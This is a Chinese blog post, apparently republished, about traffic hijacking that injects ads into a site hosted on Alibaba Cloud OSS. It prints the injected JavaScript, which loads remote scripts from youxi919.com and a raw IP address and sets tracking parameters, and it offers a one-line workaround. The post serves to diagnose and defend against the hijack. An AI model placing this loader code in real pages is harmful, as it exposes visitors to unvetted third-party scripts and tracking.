js去除运营商或者路由器添加的广告脚本

是不是偶尔发现在家里看网页的时候回插入一个广告,很烦人。开发的网站,上传到了阿里云 oss,设置了域名解析,但是在家里晚上访问的时候,总会在页面添加一个广告,导致页面卡主,一开始以为是路由器的问题,以为是中毒了,后来发现应该是运营商加的广告,不清楚是阿里oss出口加的,还是运营商加的。

分析

测试发现,访问网站首页的时候,有一个js文件被替换,被替换后的js代码如下:

(function() {
    o = "http://youxi919.com/h5web/js/index.js?";
    sh = "http://218.93.127.37:7701/main.js?v=3.94&sp=304&ty=dpc";
    w = window;
    d = document;
    function ins(s, dm, id) {
        e = d.createElement("script");
        e.src = s;
        e.type = "text/javascript";
        id ? e.id = id: null;
        dm.appendChild(e);
    };
    p = d.scripts[d.scripts.length - 1].parentNode;
    ins(o, p);
    ds = function() {
        db = d.body;
        if (db && !document.getElementById("bdstat")) {
            if ((w.innerWidth || d.documentElement.clientWidth || db.clientWidth) > 1) {
                if (w.top == w.self) {
                    ins(sh, db, "bdstat");
                }
            }
        } else {
            setTimeout("ds()", 1500);
        }
    };
    ds();
})();
var mim_params = {
    ‘sp‘: ‘304‘,
    ‘aid‘: ‘13050‘,
    ‘sda_man‘: ‘XVpZWldNXV1fWFNA‘,
    ‘src‘: ‘0‘,
    ‘adtype‘: ‘1‘,
    ‘uid‘: ‘VCpdXydAXCotUlNNKytcWF07LlxaWlJPLF1cKSQ/LyleXlJIX1teWVRKW1Y=‘,
    ‘spid‘: ‘sohu‘,
    ‘ad_list‘: ‘13050‘
};

看见了没,比较高级,居然会自动替换js文件。经测试会随机挑选首页中加载的js文件替换。

解决方法,在首页加入如下代码,清空 mim_params:

<script>
var mim_params = {};
</script>

这段脚本现在还不知道是阿里云oss那边注入的还是运营商的问题,希望有关部门可以管管。
这边查了一下oss出来的文件是没有问题的,但是为什么会被注入?比较质疑?应该是运营商的问题,奶奶的,直接注入广告!

时间: 2024-12-26 16:07:27

js去除运营商或者路由器添加的广告脚本的相关文章

js防止运营商劫持

<script type="text/javascript"> // FUCK 运营商劫持 var clearFrameAds = function () { var iframes = document.getElementsByTagName('iframe') for (var i = 0; i < iframes.length; i++) { var iframe = iframes[i] if (iframe.src && iframe.sr

运营商劫持

catalogue 1. 引言 2. DNS劫持 3. HTTP 劫持 4. 路由软件中植入劫持代码.用户PC本地木马 5. 劫持弹广告检测.防御手段 6. 检测方案 1. 引言 0x1: 原始的 DNS 投毒(DNS劫持) DNS 作为互联网的基础设施之一,起到把域名转换成 IP 地址的作用,比如 www.baidu.com --> 115.239.211.112 .各大运营商通常会以省为单位建设 2-4 台递归(或缓存)DNS 给用户使用,在 PPPoE 拨号时自动配置. 假若用户输错了域名

web开发与设计--js数据类型,js运营商

1. js数据类型划分:号码值类型,布尔,串 由typeof能够看到什么类型的数据被详述. 举例: <span style="font-family:Microsoft YaHei;font-size:18px;"><html> <head> </head> <body> <script language="javascript"> //js中变量的定义(在js中,变量用var表示,无论实际类型

运营商流量劫持攻击之链路劫持剖析

运营商流量劫持攻击之链路劫持剖析 0x00 前言 链路劫持属于流量劫持攻击的一种,在电商领域较为常见,网络上也有不少案例.本文作者将会结合公司实际发生的案例来简要剖析链路劫持有关技术.由于作者水平有限,见解浅显在所难免,望大牛勿喷,如有描述不当之处望各路看官批评指正. 0x01 劫持案例分析 案例现象描述: 有用户反馈访问公司部分业务的URL时被重定向至公司其他业务的URL,导致用户无法请求所需的服务,严重影响了用户体验以及用户利益.我们第一时间通过远控的方式复现了上述现象,并及时抓取了相关数据

乾颐堂安德- 思科运营商级别设备系统 IOS XR系统管理

思科运营商级别设备系统 IOS XR系统管理 在本小节中,我们将重点学习IOS XR如何保存.回滚配置.清除配置等常用的文件系统管理,这些内容都是在今后的日常使用中非常实用的命令 1.3.1 保存配置和加载配置 IOS XR系统不同于传统IOS系统,在配置完毕之后,这些内容并不会立即执行,只有在输入commit(提交)命令后,才会生效,这称之为二级提交模式.变更的部分称之为target config.在提交之前可以检查.修改配置,方便添加标签用于运维,支持回退特性,配置校验用户配置错误等实用命令

js去除数组中的重复值

hasOwnProperty(property) 方法 JavaScript中hasOwnProperty函数方法是返回一个布尔值,指出一个对象是否具有指定名称的属性. 使用方法: object.hasOwnProperty(proName) 其中参数object是必选项.一个对象的实例.proName是必选项.一个属性名称的字符串值. 如果 object 具有指定名称的属性,那么JavaScript中hasOwnProperty函数方法返回 true:反之则返回 false.此方法无法检查该对

新手教程:电信+广电(或其他运营商)双WAN设置

由于国内不同运营商之间互联互通存在问题,假如用联通的线路去访问电信的站点那么会比较卡,反之亦然:所以如果两个WAN的线路不是同一个运营商,一般都是建议用户双WAN模式选为“智能路由”.经过本人测试发现其实可以用下面的方法来实现电信+广电(或其他运营商)时也能带宽叠加,方法如下: WAN1接电信,WAN2接广电(或其他运营商) 1. 禁用WAN2的DNS服务器:将WAN2的DNS 服务器选为“使用下面的DNS服务器”,然后在“首选”和“备用”DNS服务器里输入0.0.0.02. 双WAN模式设置为

思科设备实现运营商城域网架构ISIS+BGP+IPV6综合实验

使用GNS3 0.8.6版本模拟器(c3725-adventerprisek9-mz.124-15.T5.image) 实验拓扑: 实验要求: 1.   通过ISIS协议将AS内部的直连和环回口路由宣告. 2.通过配置IBGP协议建立邻居将所有的用户业务路由(大客户和PPOE拨号)宣告. 3.通过配置路由反射器实现市内.省内业务路由互传. 4.通过建立EBGP邻居实现全省和国干互联网路由互传. 5.通过配置黑洞路由实现用户业务网段聚合. 6.实现城域网网络架构由ipv4向ipv6平滑过渡. 实验

【高级】思科设备部署电信运营商城域网架构及配置实战

实验拓扑: GNS3 0.8.6 + c3725-adventerprisek9-mz.124-15.T5 实验要求: 1.   通过ISIS协议将AS内部的直连和环回口路由宣告. 2.通过配置IBGP协议建立邻居将所有的用户业务路由(大客户和PPPOE拨号)宣告. 3.通过配置路由反射器实现市内.省内业务路由互传. 4.通过建立EBGP邻居实现全省和国干互联网路由互传. 5.通过配置黑洞路由实现用户业务网段聚合. 实验步骤及验证: 1.接口及ip地址规划: 路由器 接口 ip地址 R1 F0/